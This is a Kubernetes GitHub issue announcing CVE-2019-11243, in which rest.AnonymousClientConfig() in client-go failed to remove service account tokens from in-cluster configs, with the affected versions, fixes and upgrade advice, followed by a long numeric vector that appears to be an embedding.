This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2019-11243: v1.12.0-v1.12.4, v1.13.0: rest.AnonymousClientConfig() does not remove the serviceaccount credentials from config created by rest.InClusterConfig() Issue date: --- start body --- CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N The `rest.AnonymousClientConfig()` method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the following versions, `rest.AnonymousClientConfig()` did not effectively clear service account credentials loaded using `rest.InClusterConfig()`: * v1.12.0-v1.12.4 * v1.13.0 **What is the impact?** * `k8s.io/client-go` users that use the `rest.AnonymousClientConfig()` method directly with client config loaded with `rest.InClusterConfig()` receive back a client config which can still send the loaded service account token with requests. **How was the issue fixed?** * In 1.12.5+ and 1.13.1+, `rest.InClusterConfig()` was modified to return a client config that is safe to use with the `rest.AnonymousClientConfig()` method (https://github.com/kubernetes/kubernetes/pull/71713) * In v1.15.0, the `rest.AnonymousClientConfig()` will also exclude the `config.Transport` and `config.WrapTransport` fields, in addition to the explicit credential-carrying fields. (https://github.com/kubernetes/kubernetes/pull/75771) **How do I resolve the issue?** * Upgrade `k8s.io/client-go` to `kubernetes-1.12.5`, `kubernetes-1.13.1`, `kubernetes-1.14.0`, or higher * or manually clear the `config.WrapTransport` and `config.Transport` fields in addition to calling `rest.AnonymousClientConfig()` Thanks to Oleg Bulatov of Red Hat for reporting this issue. /area security /kind bug /sig auth /sig api-machinery /assign /close --- end body ---
1,845
[ -0.046337153762578964, -0.02028723992407322, -0.007013438735157251, 0.015703292563557625, 0.01597832888364792, -0.026351146399974823, 0.0160962026566267, 0.03892425820231438, 0.013280348852276802, 0.005153666250407696, -0.03934336081147194, -0.017864296212792397, -0.008290395140647888, 0.020378919318318367, 0.0323757641017437, 0.07533389329910278, -0.0360691137611866, -0.020863506942987442, 0.001524980878457427, 0.013987586833536625, -0.0021298981737345457, -0.007694482337683439, 0.006758047733455896, 0.02125641703605652, 0.0360691137611866, 0.03895045071840286, 0.020418209955096245, 0.017392804846167564, -0.03303061053156853, 0.01355538610368967, 0.02033962681889534, 0.023089995607733727, -0.01701299101114273, 0.031432777643203735, 0.038662318140268326, 0.010372817516326904, -0.0029795654118061066, 0.039579108357429504, -0.0355452336370945, -0.030725542455911636, -0.04560372233390808, -0.04741111025214195, 0.019710971042513847, 0.011538449674844742, -0.014891278930008411, -0.0040404219180345535, -0.011983746662735939, 0.007779612671583891, -0.0165414996445179, 0.013123185373842716, -0.02387581579387188, -0.05010908842086792, -0.029651587828993797, -0.07973448187112808, 0.01845366135239601, 0.01127650961279869, 0.008637465536594391, -0.0026701490860432386, 0.003382297931239009, -0.02208152785897255, -0.0007780431187711656, 0.042146116495132446, 0.017183251678943634, 0.02341742068529129, 0.0006245627882890403, 0.020418209955096245, -0.011361639946699142, 0.0010976915946230292, -0.05291184410452843, -0.01063475664705038, -0.006207973696291447, 0.013712549582123756, -0.003233319614082575, 0.012533820234239101, 0.04599663242697716, -0.005703739821910858, 0.037378814071416855, 0.041727013885974884, -0.02684883214533329, 0.022264884784817696, -0.03596433997154236, 0.023391226306557655, -0.02044440433382988, 0.001162357977591455, 0.04159604385495186, -0.012278429232537746, -0.03221859782934189, -0.0677376389503479, -0.0019580002408474684, -0.018506048247218132, -0.015244897454977036, 0.02188507281243801, 0.007065827026963234, -0.05283326283097267, 0.02009078487753868, -0.02500215731561184, -0.02299831621348858, -0.02618088573217392, -0.05333095043897629, 0.014851988293230534, -0.04366536810994148, -0.014432884752750397, -0.022002944722771645, 0.017707131803035736, 0.06249884143471718, 0.000710511754732579, 0.002444226061925292, 0.02433420903980732, -0.024504471570253372, 0.1034662276506424, 0.0042958129197359085, -0.01449836976826191, -0.0603509359061718, 0.006862823385745287, -0.030358826741576195, 0.017458289861679077, -0.007308121304959059, 0.033528298139572144, -0.06040332466363907, -0.009351251646876335, 0.010431753471493721, -0.012212944217026234, -0.0026979802642017603, -0.0010035570012405515, -0.022055333480238914, 0.020261045545339584, -0.00417466601356864, 0.016737954691052437, -0.03868851065635681, -0.01921328715980053, -0.002974654082208872, 0.004452976863831282, -0.02684883214533329, -0.010025747120380402, -0.024098463356494904, 0.004832789767533541, -0.006797338370233774, 0.02618088573217392, -0.003804676001891494, -0.010084683075547218, -0.043377235531806946, -0.021688617765903473, 0.001606018515303731, -0.0074914791621267796, -0.015179413370788097, 0.013129733502864838, 0.00901727844029665, -0.007340863812714815, -0.014956763945519924, 0.0000877907732501626, -0.007681385613977909, -0.007465285249054432, 0.043010517954826355, 0.002406572224572301, 0.07150956988334656, -0.025237902998924255, -0.005458171013742685, 0.017091574147343636, 0.002593204379081726, 0.02250063046813011, 0.008310041390359402, -0.011793840676546097, -0.019946718588471413, -0.05511213839054108, 0.009645934216678143, 0.02519861049950123, 0.004747659433633089, 0.005765950307250023, -0.044503577053546906, 0.024163948372006416, -0.0058740004897117615, -0.0076879337430000305, 0.03991962969303131, 0.008244556374847889, -0.01951451785862446, 0.006584512535482645, 0.031432777643203735, 0.008159426040947437, 0.010759178549051285, -0.01870250329375267, -0.0005930481129325926, 0.029782557860016823, -0.04497506842017174, 0.011748000979423523, 0.03337113559246063, -0.04133410379290581, -0.01578187383711338, -0.022016042843461037, -0.0005795418401248753, -0.018584631383419037, -0.006211248226463795, 0.024517567828297615, 0.018506048247218132, -0.021963654085993767, -0.06359899044036865, 0.011649773456156254, 0.005510559305548668, -0.021426677703857422, 0.031747106462717056, -0.018152430653572083, -0.0012753194896504283, -0.0030270421411842108, -0.018283400684595108, -0.006427348591387272, -0.03756217285990715, 0.01111934520304203, -0.02264469861984253, -0.0013661799021065235, 0.009632837027311325, -0.023325741291046143, -0.04109835997223854, -0.023142384365200996, 0.03182568773627281, 0.015742583200335503, 0.015113928355276585, 0.014563854783773422, 0.011584288440644741, 0.01773332618176937, -0.021662423387169838, 0.004917920101433992, -0.0005038249073550105, -0.021806489676237106, 0.0019154349574819207, 0.01958000287413597, -0.01891205459833145, -0.0000755634973756969, 0.013502998277544975, -0.030254049226641655, -0.001399740925990045, -0.03206143528223038, 0.019632389768958092, -0.009606643579900265, -0.004105906933546066, 0.007622448727488518, -0.0017369884299114347, -0.03829560428857803, 0.008401719853281975, -0.0029370002448558807, 0.013725646771490574, -0.02371865138411522, -0.00645681656897068, 0.02470092475414276, -0.03750978410243988, -0.04149127006530762, -0.004371121060103178, 0.04549894854426384, -0.034549862146377563, 0.03688112646341324, -0.004243425093591213, 0.015127024613320827, -0.014996054582297802, 0.06118914484977722, -0.00758315809071064, -0.005703739821910858, -0.009613191708922386, -0.026311855763196945, -0.02311618998646736, -0.005693917162716389, 0.0077730645425617695, 0.010647853836417198, 0.03124942071735859, -0.0013751840451732278, -0.030568378046154976, 0.041674625128507614, 0.0030368648003786802, -0.016109298914670944, -0.014694823883473873, 0.015284189023077488, -0.00011674739653244615, -0.023181675001978874, 0.031642332673072815, 0.011145539581775665, -0.011053861118853092, -0.009934067726135254, 0.003804676001891494, -0.012546917423605919, -0.012330817058682442, 0.019501419737935066, 0.028682410717010498, -0.02711077220737934, -0.0014455803902819753, -0.011833131313323975, 0.024871187284588814, 0.0023067076690495014, 0.005042341537773609, 0.008310041390359402, -0.02711077220737934, -0.05144498124718666, -0.0190037339925766, 0.010778823867440224, -0.029232485219836235, -0.013882811181247234, -0.04018156975507736, 0.0045577529817819595, -0.0012859607813879848, 0.03177330270409584, -0.0015749131562188268, 0.05199505388736725, -0.019737165421247482, 0.01896444335579872, -0.016266463324427605, 0.013103540055453777, -0.013031505979597569, 0.03690732270479202, -0.008604723028838634, 0.028682410717010498, -0.022814959287643433, 0.008519592694938183, 0.0021135269198566675, 0.0006040987209416926, 0.0028453213162720203, -0.033475909382104874, 0.012717178091406822, 0.016737954691052437, 0.04308910295367241, 0.01345061045140028, 0.0009315235074609518, 0.0021348095033317804, -0.020418209955096245, 0.01014361996203661, 0.0059329369105398655, 0.012101619504392147, -0.007439090870320797, 0.005746304988861084, 0.006096649449318647, -0.05068535730242729, -0.015650903806090355, -0.027372712269425392, -0.02536887302994728, -0.022814959287643433, -0.02028723992407322, 0.026626182720065117, -0.021596938371658325, -0.01101456955075264, -0.01732731983065605, -0.01516631618142128, -0.02547364868223667, -0.01178074348717928, 0.016410529613494873, -0.030358826741576195, -0.007910583168268204, -0.0373002327978611, 0.015205606818199158, 0.03693351522088051, -0.004793498665094376, -0.0015208880649879575, -0.0258665569126606, -0.013404770754277706, 0.02311618998646736, -0.02787039801478386, 0.0007866380619816482, -0.002599752740934491, 0.013581579551100731, -0.013247606344521046, 0.030254049226641655, -0.001096054445952177, -0.0019416289869695902, 0.01926567405462265, 0.041124552488327026, -0.03766694664955139, 0.07135240733623505, -0.03842657431960106, -0.0023198046255856752, 0.046389542520046234, 0.01273027528077364, -0.013182121329009533, -0.020483694970607758, 0.021636229008436203, -0.0017500855028629303, -0.022002944722771645, -0.02797517366707325, 0.006381508894264698, 0.0060508097521960735, 0.024425888434052467, -0.004141923505812883, -0.03313538804650307, -0.043429624289274216, 0.009999552741646767, -0.021190932020545006, 0.03203523904085159, 0.013725646771490574, -0.012036135420203209, -0.00043874920811504126, -0.03572859242558479, 0.028263308107852936, 0.025434356182813644, 0.007904034107923508, 0.034916579723358154, 0.005147117655724287, -0.003608221188187599, -0.04211992397904396, 0.06511823832988739, 0.017969071865081787, -0.027634652331471443, -0.054535873234272, 0.04277477413415909, -0.0100715858861804, -0.007838549092411995, 0.022880444303154945, -0.01685582846403122, 0.01669866405427456, 0.026154691353440285, -0.013155927881598473, 0.008224910125136375, -0.009993004612624645, 0.016462918370962143, 0.004881903529167175, -0.01706537976861, 0.016214074566960335, -0.019291868433356285, 0.027294129133224487, -0.014210235327482224, -0.0346546396613121, -0.02125641703605652, 0.02813233807682991, 0.03874089941382408, 0.015506837517023087, 0.001236028503626585, -0.011741452850401402, 0.020522985607385635, 0.014354302547872066, -0.01270408183336258, 0.03407837077975273, 0.00589037174358964, 0.02755606919527054, 0.03331874683499336, -0.0018368529854342341, 0.01165632251650095, 0.0267440564930439, -0.029756363481283188, -0.045315589755773544, 0.014576951041817665, 0.02069324627518654, 0.001317066140472889, -0.015546129085123539, -0.00069946120493114, -0.02183268405497074, -0.04528939723968506, 0.016489112749695778, -0.018178623169660568, -0.03515232354402542, 0.01905612275004387, -0.054588258266448975, 0.021033767610788345, -0.029546812176704407, -0.007930228486657143, -0.040757838636636734, -0.025748685002326965, -0.05762676149606705, -0.05427393317222595, -0.03344971686601639, 0.022422049194574356, -0.02126951329410076, -0.015624710358679295, -0.018767988309264183, -0.02079802192747593, 0.00222321436740458, -0.021714812144637108, 0.039841048419475555, 0.009613191708922386, -0.027739427983760834, 0.0015732761239632964, -0.04631096124649048, 0.01762855052947998, 0.010556175373494625, 0.015022248961031437, -0.016214074566960335, -0.04845886677503586, -0.0008058742387220263, -0.040600672364234924, 0.009993004612624645, 0.0642276480793953, -0.006987244822084904, -0.0033364584669470787, -0.025892751291394234, 0.03397359699010849, 0.00617195712402463, -0.019344255328178406, 0.0005525292945094407, 0.011427124962210655, -0.0014463990228250623, 0.033475909382104874, -0.011021118611097336, 0.040757838636636734, 0.007137860171496868, -0.04143888130784035, -0.026272565126419067, 0.013313091360032558, -0.06768525391817093, -0.01747138611972332, 0.04827551171183586, 0.00038595194928348064, 0.0165414996445179, -0.04366536810994148, 0.03177330270409584, -0.004613415338099003, 0.024478277191519737, -0.0385313481092453, 0.06239406764507294, -0.029651587828993797, 0.029782557860016823, 0.029782557860016823, 0.036095306277275085, -0.020915895700454712, 0.01396139245480299, -0.03206143528223038, -0.022985219955444336, 0.053304754197597504, -0.012802309356629848, 0.02356148697435856, -0.010117425583302975, 0.04861603304743767, -0.0037260940298438072, -0.016999894753098488, -0.005428703036159277, -0.01093598734587431, 0.012795760296285152, -0.011872422881424427, 0.014563854783773422, 0.006057358346879482, 0.004050244577229023, -0.0005476179649122059, 0.03585956245660782, 0.015140121802687645, 0.0019088864792138338, 0.004109180998057127, 0.035938143730163574, 0.02264469861984253, 0.002806030446663499, -0.05657900124788284, 0.03059457242488861, -0.028630023822188377, -0.026979802176356316, -0.033528298139572144, -0.0030827042646706104, 0.023967493325471878, 0.012363559566438198, 0.0022379483561962843, -0.024268724024295807, -0.011145539581775665, 0.015218704007565975, 0.0373002327978611, -0.0415174625813961, 0.011021118611097336, -0.012114716693758965, 0.027136966586112976, -0.016384335234761238, 0.020614665001630783, 0.02239585481584072, -0.03580717369914055, 0.006440445315092802, -0.008650562725961208, 0.0165414996445179, 0.016882020980119705, -0.007308121304959059, 0.00444642873480916, 0.025499841198325157, 0.03269008919596672, 0.009167893789708614, -0.021099252626299858, -0.016371238976716995, -0.0015806431183591485, -0.009239926934242249, -0.036514412611722946, -0.009875131770968437, -0.019815748557448387, -0.0035591074265539646, -0.00998645555227995, -0.01212126575410366, 0.006384783424437046, 0.00739325163885951, -0.03468083217740059, 0.019396644085645676, -0.0034870740491896868, -0.00842791423201561, 0.024923574179410934, -0.023024510592222214, 0.007733773440122604, -0.00646663922816515, 0.01634504459798336, -0.008696402423083782, 0.01063475664705038, 0.019344255328178406, 0.004983405116945505, 0.007164054084569216, 0.006915211211889982, 0.01252727210521698, -0.0014112008502706885, 0.0041812146082520485, -0.017759520560503006, -0.006129391957074404, 0.006528850179165602, 0.007897485978901386, 0.0038767093792557716, 0.03318777680397034, -0.0029517344664782286, 0.00865711085498333, 0.007098569069057703, 0.012592757120728493, 0.008807726204395294, -0.00634221825748682, 0.013489901088178158, 0.018728697672486305, 0.0004792680265381932, -0.011931358836591244, 0.0233126450330019, 0.008499947376549244, 0.03300441801548004, -0.0033364584669470787, 0.01685582846403122, 0.006440445315092802, 0.019449032843112946, 0.02003839612007141, -0.021557647734880447, 0.009167893789708614, 0.018100041896104813, 0.023325741291046143, 0.01757616177201271, -0.001725528622046113, 0.00047640304546803236, -0.0035951239988207817, -0.020627761259675026, 0.014459078200161457, 0.007203345187008381, -0.002221577102318406, 0.004430057480931282, 0.0005525292945094407, 0.015035346150398254, -0.003523090621456504, 0.020274141803383827, -0.01327380072325468, -0.046546708792448044, -0.015716388821601868, -0.0029222662560641766, -0.03821701928973198, 0.016358142718672752, 0.022566115483641624, 0.005625157617032528, -0.019396644085645676, 0.013247606344521046, -0.009947164915502071, 0.002917354926466942, -0.008689853362739086, 0.0540119931101799, -0.024294918403029442, 0.016567694023251534, -0.02669166773557663, 0.013188670389354229, 0.002111889887601137, -0.012435593642294407, 0.002694705966860056, -0.017536871135234833, -0.02320786938071251, 0.012900536879897118, 0.02644282579421997, 0.002770013641566038, 0.030254049226641655, 0.016829634085297585, -0.021125447005033493, -0.006613980513066053, 0.009894777089357376, -0.031485166400671005, -0.012304623611271381, -0.008578529581427574, 0.015559225343167782, 0.0036311408039182425, -0.013594676740467548, -0.0004285171744413674, 0.0023263529874384403, 0.021662423387169838, -0.024818798527121544, -0.017549969255924225, -0.03740500658750534, -0.0033053532242774963, -0.01063475664705038, 0.008133231662213802, 0.0007989164441823959, -0.017039185389876366, -0.022605406120419502, -0.011721807532012463, -0.027032190933823586, -0.013103540055453777, -0.0036999001167714596, 0.05065916106104851, -0.011977198533713818, 0.00825110450387001, 0.005081632640212774, 0.013699453324079514, 0.013738743960857391, -0.01452456321567297, -0.007995713502168655, -0.02162313275039196, 0.0008414816693402827, -0.01982884481549263, -0.0016428538365289569, -0.02547364868223667, 0.004731288179755211, 0.023037606850266457, -0.0063323951326310635, -0.005913291592150927, -0.04062686860561371, 0.030830318108201027, -0.014917473308742046, 0.07402419298887253, -0.010457947850227356, 0.03195665776729584, 0.009370896965265274, 0.008565432392060757, 0.018283400684595108, 0.03572859242558479, -0.007576609496027231, -0.0028551442082971334, -0.020915895700454712, 0.03208762779831886, -0.0033069902565330267, 0.02238275855779648, -0.005081632640212774, -0.002642317907884717, 0.006777693051844835, 0.0061948769725859165, -0.023325741291046143, -0.00475093349814415, -0.0055563985370099545, -0.03140658512711525, -0.04007679224014282, -0.005052164196968079, 0.015022248961031437, 0.0067122080363333225, -0.028630023822188377, 0.014943666756153107, 0.010752629488706589, -0.008873211219906807, 0.028656216338276863, 0.020509887486696243, -0.014956763945519924, 0.018309593200683594, 0.008421365171670914, 0.002627583919093013, 0.01613549329340458, -0.014956763945519924, -0.005579318385571241, -0.0035361875779926777, 0.04201514646410942, -0.009934067726135254, 0.01783810183405876, -0.00005003459955332801, 0.004642883315682411, -0.0012384842848405242, -0.004155020695179701, 0.007923679426312447, 0.0007428450044244528, -0.02449137344956398, 0.015375867486000061, -0.02925867773592472, -0.022068429738283157, -0.01715705916285515, -0.021295707672834396, -0.000507099146489054, 0.025787975639104843, -0.0025948414113372564, 0.02464853785932064, 0.005025970283895731, 0.0016616807552054524, 0.009180990979075432, 0.010641305707395077, 0.009449479170143604, -0.01880727894604206, -0.020588470622897148, -0.00786474347114563, -0.0050357929430902, 0.025787975639104843, 0.001014198292978108, -0.006001696456223726, 0.008290395140647888, 0.009829292073845863, -0.027477487921714783, -0.011125894263386726, -0.014406690374016762, -0.004001130815595388, 0.018204817548394203, -0.037012096494436264, 0.007701030932366848, -0.008218361996114254, -0.001718980143778026, -0.015519934706389904, 0.002480242634192109, -0.015218704007565975, -0.018558437004685402, -0.017052283510565758, 0.03447128087282181, 0.00016872608102858067, 0.016515305265784264, 0.032401956617832184, -0.02259230986237526, 0.0027290855068713427, -0.044189248234033585, 0.0011353454319760203, 0.00398475956171751, 0.020012203603982925, -0.002858418272808194, 0.0013277075486257672, -0.0036900772247463465, -0.004685448482632637, 0.012998763471841812, -0.013607773929834366, 0.0009413462248630822, -0.0019007008522748947, 0.018637018278241158, -0.016764149069786072, 0.013987586833536625, -0.030961288139224052, 0.015952134504914284, -0.019593099132180214, 0.024399694055318832, 0.009776904247701168, -0.027084577828645706, 0.004184488672763109, -0.011158636771142483, -0.01752377487719059, 0.005071809981018305, -0.005343572236597538, -0.013339285738766193, -0.0021741006057709455, -0.01127650961279869, -0.01109315175563097, -0.008585077710449696, -0.010438302531838417, -0.016515305265784264, -0.0023427242413163185, 0.012743372470140457, 0.0013268889160826802, 0.015912843868136406, -0.007406348362565041, 0.014157847501337528, -0.0155723225325346, 0.02362697198987007, 0.0018384901341050863, -0.020575372502207756, -0.001969460165128112, 0.009180990979075432, 0.021596938371658325, -0.00920063629746437, -0.02695360779762268, 0.006718756631016731, 0.017563065513968468, -0.00937744602560997, -0.05825541913509369, -0.003012307919561863, 0.010582368820905685, -0.02412465773522854, -0.005589141044765711, -0.017549969255924225, 0.006266910117119551, 0.013489901088178158, 0.02776562236249447, 0.02310309186577797, 0.01870250329375267, -0.027425099164247513, 0.021046865731477737, -0.0048982747830450535, 0.023797232657670975, 0.01089014858007431, 0.020405111834406853, 0.00730157271027565, 0.0011828220449388027, 0.011512255296111107, 0.013103540055453777, -0.02500215731561184, -0.01757616177201271, -0.015336576849222183, -0.028263308107852936, -0.0019580002408474684, -0.015022248961031437, 0.0010919616324827075, -0.014472175389528275, -0.029782557860016823, -0.0257748793810606, 0.013791131787002087, -0.007917131297290325, -0.0071116662584245205, -0.021374288946390152, -0.011584288440644741, -0.014891278930008411, 0.007478381972759962, 0.04023395851254463, -0.00540578318759799, 0.010477593168616295, -0.011551545932888985, 0.010503786616027355, 0.008100489154458046, -0.01316902507096529, 0.002064413158223033, -0.012586208991706371, -0.02690122090280056, 0.008774984627962112, 0.014236429706215858, -0.02361387573182583, -0.024373501539230347, -0.061922576278448105, -0.006941405590623617, -0.006410977337509394, 0.01967168040573597, -0.006954502314329147, 0.00013803000911138952, -0.016423627734184265, 0.008401719853281975, 0.022932831197977066, 0.016423627734184265, -0.01040556002408266, 0.0032840706408023834, 0.01685582846403122, -0.011309252120554447, -0.015808068215847015, -0.03572859242558479, -0.035440459847450256, 0.030961288139224052, -0.017510676756501198, 0.004629786591976881, 0.00008738148608244956, 0.023941300809383392, 0.02069324627518654, 0.05338333547115326, -0.033633071929216385, 0.029992109164595604, 0.001502879778854549, -0.014851988293230534, 0.01403997465968132, 0.00531410425901413, -0.005481090862303972, -0.01639743335545063, -0.009691773913800716, -0.012828502804040909, -0.011525352485477924, 0.023600777611136436, -0.004125552251935005, -0.02468782849609852, -0.014943666756153107, 0.044136859476566315, 0.005939485505223274, -0.05194266885519028, -0.01669866405427456, 0.01355538610368967, 0.009632837027311325, -0.022107722237706184, 0.016764149069786072, -0.005271539092063904, 0.036409635096788406, -0.01572948694229126, -0.01216710451990366, -0.02023485116660595, -0.025997526943683624, -0.00636513764038682, -0.00009832975774770603, 0.00786474347114563, 0.0052158767357468605, -0.004407137632369995, -0.031223226338624954, -0.027032190933823586, -0.014550757594406605, -0.014013780280947685, -0.019841941073536873, 0.0015839174157008529, 0.01870250329375267, -0.011964101344347, 0.005589141044765711, 0.0027094401884824038, -0.028734799474477768, 0.013843519613146782, 0.02311618998646736, -0.0022919734474271536, 0.015585419721901417, 0.016410529613494873, 0.001473411568440497, 0.014472175389528275, 0.005160214379429817, -0.008107037283480167, -0.0020693247206509113, -0.0223434679210186, 0.007897485978901386, -0.005638254806399345, -0.046703871339559555, -0.010097780264914036, 0.020365821197628975, -0.004495542496442795, -0.0039061775896698236, -0.000039546775951748714, -0.02889196202158928, 0.03910761699080467, -0.026875026524066925, -0.01926567405462265, 0.01478650327771902, -0.00331845018081367, 0.011145539581775665, -0.030699348077178, -0.003768659196794033, -0.0008553972584195435, -0.0035427361726760864, -0.011283057741820812, -0.031432777643203735, -0.03418314829468727, -0.026455922052264214, 0.014865085482597351, 0.05039722099900246, 0.021099252626299858, 0.016200978308916092, 0.010189459659159184, 0.026298757642507553, -0.02341742068529129, -0.004394040443003178, -0.03161613643169403, -0.027948979288339615, 0.02485808916389942, 0.01696060411632061, -0.03585956245660782, -0.01032697781920433, -0.026324952021241188, 0.02515931986272335, -0.03596433997154236, -0.023888912051916122, 0.032925836741924286, -0.029389647766947746, 0.011414027772843838, -0.011531900614500046, 0.00232471595518291, 0.005703739821910858, 0.02623327448964119, -0.0026930689346045256, 0.010228750295937061, 0.018820377066731453, 0.021439773961901665, 0.009632837027311325, -0.010196007788181305, 0.018532242625951767, -0.018532242625951767, 0.017903586849570274, -0.028368083760142326, 0.008224910125136375, -0.007602803409099579, -0.013647064566612244, 0.014105459675192833, 0.030254049226641655, 0.006496107671409845, -0.04227708652615547, -0.034497473388910294, -0.002540816320106387, -0.009770355187356472, -0.010575820691883564, -0.013319640420377254, -0.003997856751084328, -0.042303282767534256, 0.0174189992249012, 0.005458171013742685, 0.016214074566960335, -0.01659388840198517, 0.005206054076552391, -0.024818798527121544, -0.0027225371450185776, -0.007150957360863686, -0.011826583184301853, -0.03064695931971073, -0.015048443339765072, -0.021190932020545006, -0.006237442139536142, -0.04974237456917763, -0.01119137927889824, 0.008277298882603645, 0.0007244273438118398, -0.007707579527050257, 0.026220176368951797, -0.01634504459798336, -0.00012933279504068196, -0.010975278913974762, 0.024766409769654274, -0.0010706790490075946, -0.015035346150398254, -0.014668630436062813, 0.03059457242488861, 0.0010796831920742989, -0.018519146367907524, 0.001302332035265863, -0.0016191155882552266, -0.0037457395810633898, -0.007308121304959059, 0.017536871135234833, -0.027608457952737808, 0.01263204775750637, -0.014760308898985386, 0.0056775459088385105, 0.006227619480341673, 0.00001702353074506391, -0.01921328715980053, -0.037064485251903534, -0.02540816366672516, -0.024203239008784294, -0.030306437984108925, -0.015637807548046112, -0.013699453324079514, 0.06511823832988739, -0.01690821535885334, 0.005831435322761536, 0.011204476468265057, 0.0021560920868068933, 0.006149037275463343, 0.018689407035708427, 0.020863506942987442, -0.02669166773557663, 0.006564866751432419, 0.013129733502864838, -0.004865532275289297, 0.013155927881598473, -0.0005783140077255666, -0.01792978122830391, 0.004803321789950132, -0.009010730311274529, -0.0005030063330195844, 0.002400023629888892, -0.002303433371707797, -0.00024720572400838137, 0.006463365163654089, -0.001651039463467896, 0.026979802176356316, 0.008663659915328026, 0.0018843295983970165, -0.010117425583302975, -0.01604381389915943, -0.0015830987831577659, -0.006528850179165602, 0.008997633121907711, -0.037221647799015045, 0.015480644069612026, -0.018309593200683594, 0.02002529986202717, 0.006643448956310749, 0.02878718636929989, -0.030149273574352264, -0.00522569939494133, -0.03172091394662857, -0.003935645800083876, -0.011787292547523975, -0.011381285265088081, 0.03698590397834778, -0.010497238487005234, -0.026403535157442093, -0.03591195121407509, 0.01444598101079464, -0.014642436057329178, 0.0024393147323280573, 0.01720944605767727, 0.015100831165909767, -0.008113586343824863, 0.01829649694263935, -0.0011206113267689943, 0.018532242625951767, 0.02387581579387188, -0.02670476585626602, -0.008336234837770462, 0.005549849942326546, 0.010333525948226452, -0.015873553231358528, 0.007177151273936033, -0.013764937408268452, 0.003051599022001028, 0.007026535924524069, 0.0013416230212897062, 0.011800388805568218, -0.003991308156400919, -0.006987244822084904, 0.0390552282333374, -0.00970487017184496, -0.009050020948052406, 0.00043424710747785866, -0.013594676740467548, 0.032401956617832184, 0.003392120823264122, 0.012979118153452873, 0.0023885637056082487, -0.008506495505571365, 0.001451310352422297, -0.00024475003010593355, -0.027294129133224487, -0.0016862376360222697, -0.006044261623173952, 0.03675015643239021, -0.04544655978679657, -0.00832968670874834, 0.046703871339559555, 0.0036769802682101727, 0.012553466483950615, 0.040757838636636734, 0.01710467040538788, -0.00558586698025465, 0.01685582846403122, 0.028682410717010498, 0.014223332516849041, 0.01244868990033865, -0.019868135452270508, -0.026730958372354507, -0.013843519613146782, -0.0016395796556025743, 0.015952134504914284, 0.02111235074698925, -0.02229107916355133, 0.01178074348717928, 0.012337366119027138, 0.023705555126070976, -0.00919408816844225, 0.025683199986815453, -0.02188507281243801, -0.009796549566090107, 0.007962970994412899, -0.026377340778708458, -0.005192956887185574, -0.01655459776520729, -0.0016911489656195045, 0.0008369795978069305, 0.020169366151094437, -0.0011361639481037855, -0.02301141433417797, -0.005173311568796635, -0.003153100609779358, -0.00008635828999103978, 0.020313434302806854, 0.008408267982304096, -0.02377104014158249, -0.017274931073188782, 0.021190932020545006, 0.007131311576813459, 0.02255301922559738, 0.020431306213140488, -0.0017648196080699563, 0.0048360638320446014, 0.021688617765903473, -0.013686356134712696, 0.001784465042874217, 0.020784925669431686, 0.010850857011973858, 0.00003752595148398541, -0.014550757594406605, 0.02485808916389942, -0.005189682822674513, -0.019069219008088112, -0.000233290164032951, -0.01895134709775448, -0.010012649931013584, -0.011505707167088985, 0.0074325427412986755, -0.0059362114407122135, 0.011584288440644741, -0.01599142700433731, 0.025578424334526062, 0.023928202688694, -0.009239926934242249, -0.00485243508592248, 0.0063913315534591675, 0.00445952545851469, -0.0022183028049767017, -0.001140256761573255, 0.01599142700433731, -0.004701819736510515, 0.008355880156159401, -0.0059951478615403175, 0.013378576375544071, 0.023548390716314316, -0.038609929382801056, -0.051471177488565445, -0.008434462361037731, 0.018047653138637543, -0.004619963467121124, -0.0009126965887844563, -0.023967493325471878, -0.008015358820557594, 0.011138991452753544, 0.02904912643134594, -0.011800388805568218, -0.01452456321567297, 0.034759413450956345, -0.007399800233542919, -0.005716836545616388, -0.03227098658680916, -0.008925599977374077, -0.01854533888399601, 0.013909004628658295, -0.0076748370192945, -0.007740322034806013, 0.026193981990218163, -0.014616242609918118, 0.002400023629888892, 0.001198374666273594, 0.0522569939494133, -0.027791814878582954, -0.013948296196758747, 0.013116637244820595, 0.027529874816536903, -0.01644982025027275, -0.01777261681854725, 0.008565432392060757, -0.019121607765555382, 0.019226383417844772, -0.00701998732984066, -0.01063475664705038, 0.01045139878988266, -0.006623803172260523, -0.03208762779831886, 0.002385289641097188, -0.0010764090111479163, -0.0036147695500403643, 0.012592757120728493, 0.017654744908213615, -0.012455238960683346, 0.01035317126661539, 0.008205264806747437, 0.012821954675018787, -0.003739190986379981, -0.010778823867440224, -0.03195665776729584, -0.00493101729080081, -0.02065395563840866, -0.004937565885484219, 0.02479260414838791, -0.00445952545851469, -0.0063356696628034115, 0.03193046525120735, 0.03638344258069992, 0.014079265296459198, -0.03033263236284256, 0.010385913774371147, 0.014616242609918118, -0.0021790119353681803, 0.009953713044524193, -0.003775207791477442, -0.012625499628484249, 0.0033724752720445395, -0.011957553215324879, 0.00976380705833435, 0.005605512298643589, 0.0005504828877747059, -0.010719886980950832, 0.0043547498062253, -0.016318852081894875, -0.0399458222091198, -0.016672469675540924, 0.017720229923725128, -0.0002128261112375185, 0.014930570498108864, -0.029494425281882286, -0.02233036980032921, 0.01792978122830391, -0.012154008261859417, -0.017130864784121513, 0.027346517890691757, 0.0036606090143322945, -0.007137860171496868, 0.0012769566383212805, 0.0034183147363364697, 0.01618788205087185, 0.01234391424804926, 0.00010549217404332012, -0.005435251165181398, -0.017405901104211807, 0.004675625823438168, -0.006908663082867861, -0.020116979256272316, 0.039893437176942825, -0.015415159054100513, 0.0016281197313219309, -0.019540710374712944, 0.0028027561493217945, 0.010051940567791462, -0.013489901088178158, 0.015703292563557625, -0.009613191708922386, -0.03313538804650307, 0.025224804878234863, 0.024622343480587006, -0.029127709567546844, -0.009999552741646767, -0.018479853868484497, 0.0011124256998300552, 0.013339285738766193, 0.010058489628136158, -0.029651587828993797, 0.03929097205400467, -0.0036606090143322945, 0.0017779165646061301, -0.017916684970259666, -0.03525710105895996, -0.009606643579900265, -0.026246370747685432, 0.02491047792136669, 0.025486744940280914, -0.0074521880596876144, -0.018008362501859665, -0.005042341537773609, -0.01660698466002941, 0.016004523262381554, 0.005467993672937155, 0.009239926934242249, 0.016580790281295776, 0.022225594148039818, 0.0015012426301836967, 0.008925599977374077, -0.012095071375370026, 0.0040960838086903095, 0.00531737832352519, -0.022670891135931015, 0.0013743655290454626, 